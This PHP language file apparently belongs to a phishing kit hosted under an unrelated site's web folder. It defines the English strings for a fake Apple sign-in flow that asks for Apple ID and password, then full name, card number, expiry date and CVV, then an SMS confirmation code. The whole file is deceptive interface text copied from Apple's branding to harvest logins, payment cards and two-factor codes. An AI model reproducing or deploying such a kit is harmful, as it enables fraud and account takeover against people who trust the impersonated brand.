File: /home/axxoncom/public_html/Apple/langs/lang/en.php
<?php
$lang = array(
"_login_title" => "Sign in.",
"_login_subtitle" => "Sign in to your Apple account",
"_apple_id_placeholder" => "Apple ID",
"_password_placeholder" => "Password",
"_remember_me" => "Remember me",
"_forgot_apple_id" => "Forgot Apple ID or password?",
"_create_apple_id" => "Don’t have an Apple ID? Create yours now.",
"_need_help" => "Need some help? Chat now or call 1-800-MY-APPLE.",
"_encryption_notice" => "The Apple Online Store uses industry-standard encryption to protect the confidentiality of the information you submit. Learn more about our Security Policy.",
"_more_ways_to_shop" => "More ways to shop: Find an Apple Store or other retailer near you. Or call 1-800-MY-APPLE.",
"_copyright" => "Copyright © 2024 Apple Inc. All rights reserved.",
"_payment_info_title" => "Payment Information.",
"_add_card_subtitle" => "Add credit or debit card.",
"_full_name_placeholder" => "Full name",
"_card_number_placeholder" => "XXXX XXXX XXXX XXXX",
"_exp_date_placeholder" => "MM/YY",
"_cvv_placeholder" => "CVV",
"_continue_button" => "Continue",
"_confirmation_title" => "Confirmation.",
"_confirmation_subtitle" => "Enter confirmation code we sent to your number.",
"_sms_code_placeholder" => "SMS CODE",
"_incorrect_code" => "Incorrect code",
"_request_new_code" => "Request new code.",
"_new_code_sent" => "We have sent a new code."
);
?>